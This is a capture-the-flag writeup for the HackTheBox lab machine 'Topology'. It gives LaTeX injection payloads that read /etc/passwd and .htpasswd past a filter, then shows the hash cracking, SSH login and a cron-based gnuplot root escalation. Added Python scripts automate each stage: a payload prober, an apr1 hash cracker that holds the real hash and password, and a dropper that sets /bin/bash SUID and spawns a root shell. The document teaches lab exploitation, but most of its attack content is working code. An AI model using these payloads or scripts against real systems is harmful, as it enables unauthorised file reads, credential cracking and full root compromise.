Topology – HackTheBox Writeup
Machine Name: Topology
IP: 10.10.11.217
Difficulty: Easy
Summary
Topology is an easy machine that starts with a LaTeX injection in a web-based equation generator, which is used to read files on the server, including one containing a password hash. After cracking the hash, it was possible to log in via SSH and obtain the user flag. Privilege escalation consisted of enumerating processes run by root: a cron job executed every ".plt" file in a directory to which the user had write permission. Finally, it was a simple matter of looking up the gnuplot documentation for running OS commands from such a file and using that to gain a shell as root.
Information Gathering
An Nmap scan shows that ports 22 (SSH) and 80 (HTTP) are open. Port 80 is running Apache httpd 2.4.41 on Ubuntu.
The website is a university page for the Department of Mathematics. It links to a LaTeX Equation Generator, which redirects to a new subdomain, "latex.topology.htb/equation.php". Let's add that to the /etc/hosts file.
Entering something like "\frac{sid}{thoviti}" generates an image containing the rendered expression.
LaTeX Injection
If you have heard of LaTeX injection before, that is the way to go (read the linked blog post on the topic). The LaTeX below reads the first line of a file:
\newread\file \openin\file=/etc/passwd \read\file to\line \text{\line} \closein\file
URL: http://latex.topology.htb/equation.php?eqn=\newread\file\openin\file=/etc/passwd\read\file%20to\line\text{\line}\closein\file
If we use a loop to print every line of the file, we get an "Illegal command detected. Sorry." message instead:
\newread\file \openin\file=/etc/passwd \loop\unless\ifeof\file \read\file to\fileline \text{\fileline} \repeat \closein\file
URL: http://latex.topology.htb/equation.php?eqn=\newread\file\openin\file=/etc/passwd\loop\unless\ifeof\file\read\file%20to\fileline\text{\fileline}\repeat\closein\file
The website has some kind of filter or WAF that blocks this code. Let's try the other file-read payloads from HackTricks:
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim} \verbatiminput{/etc/passwd}
All of these are blocked with the same "Illegal command detected. Sorry." message, except the "\lstinputlisting{}" payload, which is not caught by the filter but fails with a different error.
To get around this error, wrap the command in $ signs so that LaTeX treats it as an inline formula:
$\lstinputlisting{/etc/passwd}$
We discover a user named “vdaisley”.
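The probing above is worth automating once a filter is in play, so the candidate payloads can be sent in one batch and the verdicts compared side by side. The script below is an added example and not part of the original writeup: it builds the file-read payloads listed above, URL-encodes them for the eqn parameter (the browser did this implicitly for the URLs shown), and classifies each response. The "Illegal command detected. Sorry." string and the target URL come from the page; treating a raw PNG body as success is an assumption, since the page only says an image is generated.

```python
"""Added example (not from the writeup): batch-probe equation.php with the
LaTeX file-read payloads and classify the responses."""
import urllib.error
import urllib.request
from urllib.parse import parse_qs, quote, urlsplit

BASE_URL = "http://latex.topology.htb/equation.php"   # target from the writeup
FILTER_MESSAGE = "Illegal command detected. Sorry."    # filter response seen on the page


def payloads(path):
    """File-read payloads from the writeup, keyed by technique. On the target,
    read_first_line and both \\lstinputlisting variants pass the filter, but
    only the math-wrapped \\lstinputlisting renders the whole file."""
    return {
        "read_first_line": rf"\newread\file \openin\file={path} \read\file to\line \text{{\line}} \closein\file",
        "read_loop": rf"\newread\file \openin\file={path} \loop\unless\ifeof\file \read\file to\fileline \text{{\fileline}} \repeat \closein\file",
        "input": rf"\input{{{path}}}",
        "verbatiminput": rf"\usepackage{{verbatim}} \verbatiminput{{{path}}}",
        "lstinputlisting": rf"\lstinputlisting{{{path}}}",
        "lstinputlisting_inline": rf"$\lstinputlisting{{{path}}}$",
    }


def build_url(payload):
    """URL-encode the payload as the eqn parameter. safe='' also encodes
    backslashes, braces and '=' so nothing is mangled on the way."""
    return f"{BASE_URL}?eqn={quote(payload, safe='')}"


def decoded_eqn(url):
    """Recover the eqn value the server will see (used to check the encoding)."""
    return parse_qs(urlsplit(url).query)["eqn"][0]


def classify(body):
    """Classify a response body (bytes): 'blocked' is the filter message from
    the page; 'image' assumes a raw PNG is returned on success (assumption);
    anything else is 'other' and deserves a manual look."""
    if FILTER_MESSAGE.encode() in body:
        return "blocked"
    if body.startswith(b"\x89PNG"):
        return "image"
    return "other"


def probe(path="/etc/passwd", timeout=10):
    """Send every payload and return {technique: classification}."""
    results = {}
    for name, payload in payloads(path).items():
        try:
            with urllib.request.urlopen(build_url(payload), timeout=timeout) as resp:
                body = resp.read()
        except urllib.error.HTTPError as err:   # 4xx/5xx responses still carry a body
            body = err.read()
        results[name] = classify(body)
    return results


if __name__ == "__main__":
    for technique, verdict in probe().items():
        print(f"{technique:24s} {verdict}")
```

Run it from a host that has the latex.topology.htb entry in /etc/hosts; an "other" verdict for the plain \lstinputlisting payload and "image" for the $-wrapped one reproduces what the manual probing found.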
Getting a User Shell
We know the server is using Apache, so the next logical step is to check the "/var/www/dev/.htpasswd" file, which might contain usernames and their hashed passwords.
http://latex.topology.htb/equation.php?eqn=$\lstinputlisting{/var/www/dev/.htpasswd}$
Great, we discovered the password hash for "vdaisley". The output is an image, so use an OCR tool to extract the text, then crack the hash with john. The "$apr1$" prefix marks an Apache MD5 (apr1) hash, which john's md5crypt format handles. Write the hash to a file with single quotes: with double quotes the shell would expand "$apr1", "$1" and "$58" as variables and write a mangled hash.
echo '$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0' > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt hash.txt
John cracks the hash: the password is "calculus20". Let's log in through SSH as vdaisley.
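An OCR'd hash can carry transcription errors, so it helps to be able to verify a candidate password against the hash independently of john. The code below is an added example, not part of the writeup: it implements Apache's $apr1$ variant of MD5-crypt with only the standard library and runs a small dictionary attack against the htpasswd line from the page. The hash line is the one OCR'd above; the wordlist is constructed for the example.

```python
"""Added example (not from the writeup): verify and dictionary-crack an Apache
$apr1$ .htpasswd hash using only hashlib."""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

HTPASSWD_LINE = "vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0"        # OCR'd from the page
WORDLIST = ["password", "vdaisley", "topology", "math2023", "calculus20"]  # constructed


def _to64(value, count):
    """crypt(3)-style base64: emit the low 6 bits first, itoa64 alphabet."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_crypt(password, salt, magic="$apr1$"):
    """Apache's MD5-crypt variant: identical to $1$ md5crypt apart from the
    magic string. Salt is at most 8 characters; 1000 stretching rounds."""
    pw, sl, mg = password.encode(), salt[:8].encode(), magic.encode()
    ctx = hashlib.md5(pw + mg + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    n = len(pw)
    while n > 0:                      # len(pw) bytes of the alternate digest
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                          # one byte per bit of len(pw)
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):             # stretching rounds
        r = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            r.update(sl)
        if i % 7:
            r.update(pw)
        r.update(final if i & 1 else pw)
        final = r.digest()
    f = final
    encoded = (_to64(f[0] << 16 | f[6] << 8 | f[12], 4)
               + _to64(f[1] << 16 | f[7] << 8 | f[13], 4)
               + _to64(f[2] << 16 | f[8] << 8 | f[14], 4)
               + _to64(f[3] << 16 | f[9] << 8 | f[15], 4)
               + _to64(f[4] << 16 | f[10] << 8 | f[5], 4)
               + _to64(f[11], 2))
    return magic + sl.decode() + "$" + encoded


def parse_htpasswd_line(line):
    """Split 'user:$apr1$salt$digest' into (user, salt, full hash)."""
    user, hashed = line.strip().split(":", 1)
    _, magic, salt, _digest = hashed.split("$")
    if magic != "apr1":
        raise ValueError(f"not an apr1 hash: {hashed}")
    return user, salt, hashed


def verify(password, hashed):
    """Recompute the hash with the stored salt and compare in constant time."""
    _, magic, salt, _digest = hashed.split("$")
    return hmac.compare_digest(apr1_crypt(password, salt, f"${magic}$"), hashed)


def crack(line, wordlist):
    """Return (user, password) for the first wordlist entry that verifies, else None."""
    user, _salt, hashed = parse_htpasswd_line(line)
    for candidate in wordlist:
        if verify(candidate, hashed):
            return user, candidate
    return None


if __name__ == "__main__":
    print(crack(HTPASSWD_LINE, WORDLIST))
```

For a real wordlist this is far slower than john or hashcat (mode 1600 for apr1), but a few thousand candidates per second is plenty to confirm a single OCR'd hash before spending time on SSH attempts.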
ssh vdaisley@topology.htb
And we’re in!
Privilege Escalation
As always, I tried sudo -l, but it did not result in anything interesting. Therefore, I transferred linpeas and ran it. Apart from finding some more subdomains, I did not find anything interesting.
In that case, I always transfer pspy and check for processes that are run by root. We see that a cron runs files in “/opt/gnuplot/” that end with the extension “.plt” using the find command.
We have only write and execute permissions on the "/opt/gnuplot" directory: we can create files in it but cannot list its contents. Since find executes every file ending in ".plt" inside this directory, let's find a way to create a malicious .plt file.
The gnuplot documentation describes the "system" command, which runs an OS command string through the shell:
system "command string"
Let's use this to set the SUID bit on the bash binary when cron runs our file through find. The file has to be created inside /opt/gnuplot:
echo 'system "chmod u+s /bin/bash"' > /opt/gnuplot/rootme.plt
As soon as the cron job runs the file, the SUID bit is set on /bin/bash and "bash -p" gives a root shell. The -p flag matters: without it, bash drops the effective UID back to the real UID at startup and the SUID bit has no effect.
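The wait for the cron job is the part most people get wrong (spawning bash before the bit is set, or forgetting -p). The script below is an added example rather than the writeup's own steps: it drops the gnuplot payload into the directory, polls /bin/bash until the SUID bit appears, then execs bash -p. The directory, target binary and cron behaviour are taken from the page; the poll interval and timeout are assumptions.

```python
"""Added example (not from the writeup): plant a gnuplot `system` payload in the
directory the root cron job scans, wait for the SUID bit, then exec bash -p."""
import os
import stat
import sys
import time

PLT_DIR = "/opt/gnuplot"   # directory the root cron job runs *.plt files from (page)
TARGET = "/bin/bash"       # binary the payload makes SUID (page)


def gnuplot_payload(command):
    """Wrap a shell command in gnuplot's `system "..."` statement. Double-quoted
    gnuplot strings honour backslash escapes, so embedded quotes are escaped."""
    return 'system "%s"\n' % command.replace('"', '\\"')


def write_plt(directory, name="rootme.plt", command="chmod u+s /bin/bash"):
    """Create the .plt file in `directory` and return its path."""
    path = os.path.join(directory, name)
    with open(path, "w") as handle:
        handle.write(gnuplot_payload(command))
    return path


def is_suid(path):
    """True when the set-user-ID bit is present in the file's mode."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def wait_for_suid(path, timeout=120, interval=5):
    """Poll until `path` becomes SUID or `timeout` seconds elapse (assumed values)."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if is_suid(path):
            return True
        time.sleep(interval)
    return False


if __name__ == "__main__":
    planted = write_plt(PLT_DIR)
    print(f"planted {planted}, waiting for cron ...")
    if wait_for_suid(TARGET):
        # -p keeps the effective UID; without it bash drops privileges at startup
        os.execv(TARGET, ["bash", "-p"])
    sys.exit("timed out: SUID bit never appeared on " + TARGET)
```

Because the directory is writable but not listable, write_plt cannot confirm the file is gone after the cron job ran; polling the target binary's mode is the reliable signal that the payload executed.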
Pwned!